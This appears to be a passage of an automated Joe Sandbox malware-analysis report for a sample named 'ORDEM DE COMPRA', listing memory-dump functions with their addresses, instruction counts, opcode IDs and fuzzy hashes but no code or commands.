                • Opcode Fuzzy Hash: 348adcf413c4a85a158b5dcf51faf0da588d89c70763173942f9c05bdf8be63b
                • Instruction Fuzzy Hash: 5971153070E6495FDB49AB2884A59B57BE0EF46320F1401FDD04DC72A7CA2DBC46C791
                Function 00007FFD348A5070 Relevance: .2, Instructions: 238COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ae2f1f49b5faf16ba82dfdcc430b320e31431dd9fecb4790928bf0369a4bb94
                • Instruction ID: 1081245d1e6cc6ff707684d15c809b6f45e353392501ba9f220497156f6c6332
                • Opcode Fuzzy Hash: 1ae2f1f49b5faf16ba82dfdcc430b320e31431dd9fecb4790928bf0369a4bb94
                • Instruction Fuzzy Hash: AC714F307189099FEBA5EB28C8A9B7937E1FF59710F1400B9D44DC72A6DE68EC058781
                Function 00007FFD348A2AFB Relevance: .2, Instructions: 234COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 140f3c6ae65478c53f35c0f7c79d19978e43704b01b7e935477d1c1edb1eaa75
                • Instruction ID: 919224c8d55be29076ae7cf72d3d0860ff52d04334099bdacadb0b1a0d2e3c27
                • Opcode Fuzzy Hash: 140f3c6ae65478c53f35c0f7c79d19978e43704b01b7e935477d1c1edb1eaa75
                • Instruction Fuzzy Hash: 13519727B0D6615BD761ABFCB8F11E57BA0DF4237570801B7D288CB193DD68744A83A1
                Function 00007FFD348A5000 Relevance: .2, Instructions: 230COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: de0903e65e8faf6d7391e7dc9b0c8147d73a98aa58adf4afb5acd5ded623dbe4
                • Instruction ID: 39d91909bf72ec970b343e2eab03916559e2057b43beee8410644da0a2db5c53
                • Opcode Fuzzy Hash: de0903e65e8faf6d7391e7dc9b0c8147d73a98aa58adf4afb5acd5ded623dbe4
                • Instruction Fuzzy Hash: 96512821B1CE064BE7A8A75CA4A65B5B3C1EB9A360F14427FE94DC32D6DD28FC4252C1
                Function 00007FFD348A4D58 Relevance: .2, Instructions: 229COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43e1469156618262898c2961817670ca8eeda406c06c34b2b2d7f86d785c13c7
                • Instruction ID: 7fbd6d3e4d7a690675db5ffb44870a8543cd718506b336defffb4b9fc350d2e4
                • Opcode Fuzzy Hash: 43e1469156618262898c2961817670ca8eeda406c06c34b2b2d7f86d785c13c7
                • Instruction Fuzzy Hash: 46615921B1EE8A0FE7E59B7C58A53BA77D1EF46214F0841BED54DC3293CE6CA8018381
                Function 00007FFD348AD1B0 Relevance: .2, Instructions: 220COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7cccc753ed75590d63b84264916bdfd8b8363e06060606c3bb766b93e8bd0075
                • Instruction ID: 54bb02c14d1fe208ec10ec1bdd862efe9a467b0e461b775f0a15cad3b0666a8a
                • Opcode Fuzzy Hash: 7cccc753ed75590d63b84264916bdfd8b8363e06060606c3bb766b93e8bd0075
                • Instruction Fuzzy Hash: 4551F962B0E7C50FD7969B6C98A51603FE2DF5B22470941FBD489CB1D3DD5C6C068361
                Function 00007FFD348A5478 Relevance: .2, Instructions: 208COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b538da5a5b89ba8aa3e06adb2dc2b3a7a1687bb262a905eb7b46732da89b65da
                • Instruction ID: 816e7920e68840929399ba0c5cf23f673ce36e05dce5b13616f71b63358b8d4b
                • Opcode Fuzzy Hash: b538da5a5b89ba8aa3e06adb2dc2b3a7a1687bb262a905eb7b46732da89b65da
                • Instruction Fuzzy Hash: 4A51CA71B1DB1C4F9B589B5CE8460B977E1FB9A721F10023FE58AC3211DA21B85386C2
                Function 00007FFD348A5C08 Relevance: .2, Instructions: 201COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: af8155d98f6fcb4e5ada557824a9395a46d2f63fb8b2cc6924f1a8ccbcaacbd8
                • Instruction ID: b7da02f12043fcb32945f1107241dc74e7bd5d70a5e21cce77f4f5dd9b16c1fb
                • Opcode Fuzzy Hash: af8155d98f6fcb4e5ada557824a9395a46d2f63fb8b2cc6924f1a8ccbcaacbd8
                • Instruction Fuzzy Hash: A7510A2170D9490AE794B26CA8A52FA77D5EF86331F04467FE28DC3183ED6DA84252D0
                Function 00007FFD348A1B32 Relevance: .2, Instructions: 194COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d7cb7d70259300401e958e7e389a1b9d4edd3ade6f15cd79dd4943a8f3dc7ff4
                • Instruction ID: 6879c15c704ac86ee5323a0cef2d33ee15197b5609d4109b1410ed72da507ebc
                • Opcode Fuzzy Hash: d7cb7d70259300401e958e7e389a1b9d4edd3ade6f15cd79dd4943a8f3dc7ff4
                • Instruction Fuzzy Hash: 9361A422E0F6C25FE7A6977848B51657FE0AF1326470D01FBC598CB0D3ED5D680A9362
                Function 00007FFD348AA878 Relevance: .2, Instructions: 185COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 04689f15d4c73b9ee5172d3b2f46ee07e1ae32eca96ca5a974a21f8535bbe442
                • Instruction ID: 5eb18ba4186a8a4f44c30f504dd5e9df6d4046a40f96eacccd4274068dd0cdce
                • Opcode Fuzzy Hash: 04689f15d4c73b9ee5172d3b2f46ee07e1ae32eca96ca5a974a21f8535bbe442
                • Instruction Fuzzy Hash: C241233170CA1A1FE764AB1CA8A55B677D0EB56329B1400BAD549C3192ED6EBC8383C0
                Function 00007FFD348BBE60 Relevance: .2, Instructions: 166COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 822f110f82a3f2a94bca07a13a346fa176adea557f0af9b2c7d798bacc254678
                • Instruction ID: ecbe070621ed55a13ea854655a750cff41d0aa07d50dd431d4f755338594705f
                • Opcode Fuzzy Hash: 822f110f82a3f2a94bca07a13a346fa176adea557f0af9b2c7d798bacc254678
                • Instruction Fuzzy Hash: 5E41F521F18E4A4FEBA49B1D94E46B2B7D1EF95310B0441BBD54EC3A92DD6CE84287C0
                Function 00007FFD348C4D98 Relevance: .2, Instructions: 163COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c6ec4a5971dad2605b3bb8b813256494e999d0bef11a89076a0f16ff91f83b97
                • Instruction ID: 33a88cbafa52b50863810381acc6d402b7de707ed0d4893780587cab472e18d2
                • Opcode Fuzzy Hash: c6ec4a5971dad2605b3bb8b813256494e999d0bef11a89076a0f16ff91f83b97
                • Instruction Fuzzy Hash: 1951FE31719A0A4FEBA4DF1894905A6F3E2FF9A310B0405BFD54AC3691DE28FC06DB40
                Function 00007FFD348A40C5 Relevance: .1, Instructions: 146COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ed30d146872a52de348c7f851dbba42ab8965a0f8daae83d05cdf5b68e18475c
                • Instruction ID: dc1f62215956c6cc710aff93046812d81fc1b0f0f9da7d3d06b550e60199cb0e
                • Opcode Fuzzy Hash: ed30d146872a52de348c7f851dbba42ab8965a0f8daae83d05cdf5b68e18475c
                • Instruction Fuzzy Hash: 9651A471609A8A8FDFC8CF18C8A4A6537A1FF59308B1406ADE46DC73D2CB75E812C711
                Function 00007FFD348A5488 Relevance: .1, Instructions: 136COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b83ec1b33f854c0b0036454653a316e972f77a080086e46cb68248441539657a
                • Instruction ID: c7cfb9b398849048a9a2e51425e582f42f27b30e1da64fe9cb04ce2a80d589f1
                • Opcode Fuzzy Hash: b83ec1b33f854c0b0036454653a316e972f77a080086e46cb68248441539657a
                • Instruction Fuzzy Hash: 8641957171A6188FDB88EB18D4919B977E1EF95310F5001ADE44EC7293DE28FC42CB91
                Function 00007FFD348A2536 Relevance: .1, Instructions: 130COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 777c8f8cd583edc1801580f00c22a4bc187ffc295a64da997c5eb1abe233cb4d
                • Instruction ID: 8529819c4824d59be3ffe961f5a78324335e081df9973a09418396efca069267
                • Opcode Fuzzy Hash: 777c8f8cd583edc1801580f00c22a4bc187ffc295a64da997c5eb1abe233cb4d
                • Instruction Fuzzy Hash: B041D221A0F6D20FE7A797B858B55A57FE1DF47220B0901FAC989CB193C94D5C4BC3A1
                Function 00007FFD348A50E2 Relevance: .1, Instructions: 129COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3f0fcba66219c3b8e8f193f33977a682a5771f61ab185fab14ad2a924a1adb8e
                • Instruction ID: 9c83499d4fe4eafd7e5d38798565412e1cc8446f2f75ba6b0fdda12ebc052dbf
                • Opcode Fuzzy Hash: 3f0fcba66219c3b8e8f193f33977a682a5771f61ab185fab14ad2a924a1adb8e
                • Instruction Fuzzy Hash: 11318531714C094FEBE8EB9C94A8AB573D1EF9931175401BAD90DC73A5DD68DC8287C0
                Function 00007FFD348A2BD3 Relevance: .1, Instructions: 127COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5949e8cf2c6b6a5751d885f757415160785b91a8b984a80a17b0a6a4fb5780cf
                • Instruction ID: 03821744eb7df4bc9b8c9b41daf0c60725866f1bf7020cd0252cbd1db480f1ae
                • Opcode Fuzzy Hash: 5949e8cf2c6b6a5751d885f757415160785b91a8b984a80a17b0a6a4fb5780cf
                • Instruction Fuzzy Hash: BC319353B0E6A51BD762ABFCA8F11E67BA0DF5232470D01B3D1C8CB197EC6874468391
                Function 00007FFD348AE040 Relevance: .1, Instructions: 123COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b7725a8c48a656e5b3a8f2f790ab873b9a2237d7546ede719f6c30f46ed8756
                • Instruction ID: 668cd9d2c85895f044b1910e9ecdb2ceef7823e0e7332ec552f3c156b3d2e9d0
                • Opcode Fuzzy Hash: 4b7725a8c48a656e5b3a8f2f790ab873b9a2237d7546ede719f6c30f46ed8756
                • Instruction Fuzzy Hash: B331D321B099090FEEE4EB5C58E4AB563D2EF9A391B4441B7E64DC3296DD2ADC029380
                Function 00007FFD348A98DD Relevance: .1, Instructions: 121COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf6c06c658875ee78395da5c5315719317a19e09baa2e055b5aa342c61e0f17a
                • Instruction ID: 262419b382d557824eaa98cf2d2415b28d894145ad6bf731ff83b4c2ca57ea16
                • Opcode Fuzzy Hash: bf6c06c658875ee78395da5c5315719317a19e09baa2e055b5aa342c61e0f17a
                • Instruction Fuzzy Hash: B231FB21B1DF860FD3AAE7A898A54B577E1EF5521070441BFD04EC35D3DD68BC0A8391
                Function 00007FFD348A2C8D Relevance: .1, Instructions: 119COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a78151d3850f37e8802df73c98ac1686d8d6b0886bbb30ea10f5be8eea166ace
                • Instruction ID: fd8771f9e2935c6b3a39c0758fce5254ff70cdecf4cc4dd0388a2a2136036e02
                • Opcode Fuzzy Hash: a78151d3850f37e8802df73c98ac1686d8d6b0886bbb30ea10f5be8eea166ace
                • Instruction Fuzzy Hash: 6F31AC52B0E6D10BD766A7BCA8B11E93FA0DF4322470D01F3D5D8CB197EC68684A83A1
                Function 00007FFD348A50A3 Relevance: .1, Instructions: 119COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c89d46b47e88fae5ced6bf12013f67ef7a7711284109c3e5b33e5ffd5d340ef7
                • Instruction ID: 371b672287d04a33bdbc59ee7d7c85e3c6d6f45259b8f3fe0fe419f26b0c8198
                • Opcode Fuzzy Hash: c89d46b47e88fae5ced6bf12013f67ef7a7711284109c3e5b33e5ffd5d340ef7
                • Instruction Fuzzy Hash: 3C21C932B1D9190FF66C961CB8975B533D1DF96270708017BE98AC31A7EC8ABC4352C5
                Function 00007FFD348B6E80 Relevance: .1, Instructions: 118COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4183ad282660a12358f6771704181a94289589daa7987996960b1bafc159d0f4
                • Instruction ID: f36bc745d770415a35333267c9c68fe01917970d0b3d148be62edcf30250a0e8
                • Opcode Fuzzy Hash: 4183ad282660a12358f6771704181a94289589daa7987996960b1bafc159d0f4
                • Instruction Fuzzy Hash: 8E31A132F09D484FEF819E58A8A91ED37D1EFDE314B19017BD54CE73A1DE64A8018782
                Function 00007FFD348A2C30 Relevance: .1, Instructions: 109COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 69e461766634032a4934052e2e20aa960457295b7f6ae18a7bc977c5a90ad0f6
                • Instruction ID: b0037901587b109b3e0c3b997a76d2632eac67aa6afc27bea50b1f38abf28ca8
                • Opcode Fuzzy Hash: 69e461766634032a4934052e2e20aa960457295b7f6ae18a7bc977c5a90ad0f6
                • Instruction Fuzzy Hash: 29213953F0ED8A0FEBE9A75C14B52B417D1EF9A256B0402B7D81EC71C6DD5CA8068381
                Function 00007FFD348A5D20 Relevance: .1, Instructions: 108COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 23bcd91cbee880a35846197ad6ea6f3e7c52c63bcec89106fa02fbffb6b50549
                • Instruction ID: 0ed7c7ccaa9ed6ce8b6cb366388a5051bbab65bd71ae2527f6d406cc4fe237dd
                • Opcode Fuzzy Hash: 23bcd91cbee880a35846197ad6ea6f3e7c52c63bcec89106fa02fbffb6b50549
                • Instruction Fuzzy Hash: 27212232A1C9890FDB5CAA9898A69F937D4EF65710F04106EF84FD3283DD39B8068281
                Function 00007FFD348A5CFA Relevance: .1, Instructions: 107COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 02d254842b868b482b4de69655dac0a1f1d3a8b8dce10c33b9c06ce45dfc3f48
                • Instruction ID: b116011500d21f043924b23d633b8b114067d6538f18b677f9ded39535a87ebd
                • Opcode Fuzzy Hash: 02d254842b868b482b4de69655dac0a1f1d3a8b8dce10c33b9c06ce45dfc3f48
                • Instruction Fuzzy Hash: 3821D232B1CA410FE75CA69CA8A65BAB7D0EF99324F04507FF08ED3197DD34B8464282
                Function 00007FFD348B57B0 Relevance: .1, Instructions: 106COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7a511a022f2120dc429e8f7a6b8c4fed490a6202cb35ad8dd848a4b00eb9a7c1
                • Instruction ID: f36b74d7949b34d65f0d4d84b39a65c724a5ce2ea9f127f5e9e7f2c358f305fb
                • Opcode Fuzzy Hash: 7a511a022f2120dc429e8f7a6b8c4fed490a6202cb35ad8dd848a4b00eb9a7c1
                • Instruction Fuzzy Hash: 2B31F431719B088FD784EB1CD095AAAB7E1EF9A354F00067AE549C3260CE74E8418BC2
                Function 00007FFD348D1620 Relevance: .1, Instructions: 104COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9e729f83bc90070a6361a370c3772747a5fa8bcff48674e1ae7506d064e9b793
                • Instruction ID: cebc752f0b68d7edb9c0211817cb6b1880b1f6bf5b52b40941ab5fc7e0a82c9a
                • Opcode Fuzzy Hash: 9e729f83bc90070a6361a370c3772747a5fa8bcff48674e1ae7506d064e9b793
                • Instruction Fuzzy Hash: E731933071AE0A5FDBA4EB5DC0E5E62B3E1FF6A310B500579D64EC3252CA29F881DB40
                Function 00007FFD348A3D00 Relevance: .1, Instructions: 95COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ceb7c2a8c05f49150f57a0d969e2087b141416d32c0ddc665f985ac70508d4e5
                • Instruction ID: 10c62143e028b6418a665993f4c195d3934e872ff98c3b3f7adc6861170882ad
                • Opcode Fuzzy Hash: ceb7c2a8c05f49150f57a0d969e2087b141416d32c0ddc665f985ac70508d4e5
                • Instruction Fuzzy Hash: 4D21EC3270D7955FD752D76CE8B11DA7BE0EF82361F08017BD544CB193DE6894058392
                Function 00007FFD348A3AA7 Relevance: .1, Instructions: 94COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6111718c488bec145b2da3ebd7434013fedd3efdb7b7de260bc796666175d24e
                • Instruction ID: b80287b93ced282375fa5a067699d026f1df59326162cd0b6343df9925f87fe7
                • Opcode Fuzzy Hash: 6111718c488bec145b2da3ebd7434013fedd3efdb7b7de260bc796666175d24e
                • Instruction Fuzzy Hash: 2521AF30719D094FDA9CEB2DD899A6573E1FFA9310B1002ADE04EC36A2DE65FC458740
                Function 00007FFD348A2C40 Relevance: .1, Instructions: 85COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3672d3497ee10011a26e2dc9bdc766b233b971691939ff1066eb0c53eca87ef
                • Instruction ID: f8598ebf892c4c2aa25d51ae91c3d31a1bc9c474b1906820f8b647db86f62969
                • Opcode Fuzzy Hash: c3672d3497ee10011a26e2dc9bdc766b233b971691939ff1066eb0c53eca87ef
                • Instruction Fuzzy Hash: B021F332F0EC0D4AEBD5AB5C68762FD37E1FF86344F000176D51DD2281DE6969018392
                Function 00007FFD348AA320 Relevance: .1, Instructions: 83COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 30c686b3e76339289649934fd2c5ec7cc9a9abd0dd9522d1e095863a438fb37f
                • Instruction ID: 4ee5824fd4652d8289e2ec57d4387a500f351ec2529b6b01478a50adc11bdcab
                • Opcode Fuzzy Hash: 30c686b3e76339289649934fd2c5ec7cc9a9abd0dd9522d1e095863a438fb37f
                • Instruction Fuzzy Hash: 21210520B0E98A0FE7D9E76C94B06A537E1EF9A340B4841BAD10DC7587DD6CE8428390
                Function 00007FFD348A54D0 Relevance: .1, Instructions: 80COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: da8dbb884c5aa1873d364ee79f428fdc689571f787e703c31e9c475e49c20fd2
                • Instruction ID: ae4a0eb9baaf1f31d7c5f9c1c1cbaf959c87496c9f119cf7af6eb18c6aaff901
                • Opcode Fuzzy Hash: da8dbb884c5aa1873d364ee79f428fdc689571f787e703c31e9c475e49c20fd2
                • Instruction Fuzzy Hash: 7F21F825A1E68A4FE7A5AF7488656E577E0FF53210F0406FAD00DD71D2DE2C684A8781
                Function 00007FFD348AE1F2 Relevance: .1, Instructions: 74COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f5fb50c17ce33fd3a11b70af34a8f619a7987eda8fb0edde0f5f6576d125bb0b
                • Instruction ID: 7f09c304f3e583248ac5b709050a17a83756567f794374a4b6d915fbb7b6992f
                • Opcode Fuzzy Hash: f5fb50c17ce33fd3a11b70af34a8f619a7987eda8fb0edde0f5f6576d125bb0b
                • Instruction Fuzzy Hash: D321DA22E0D1961FE7A167BC54F21E63BA4DF43324F0C01B6D18CCB183ED6C24469661
                Function 00007FFD348A21FF Relevance: .1, Instructions: 74COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 332b4aea37683a57082ca2331bd6f6dbfe2ce3544e454bb63d4d2371658a5164
                • Instruction ID: 7d3c45c31cc36f013b645e62c450bcc9b9d09604bcddc5e359a10d28b25faefb
                • Opcode Fuzzy Hash: 332b4aea37683a57082ca2331bd6f6dbfe2ce3544e454bb63d4d2371658a5164
                • Instruction Fuzzy Hash: C8112420A1F2494FE79AE77884966B97BE1EF42320F0400BDD14EC71A3CC5C98059755
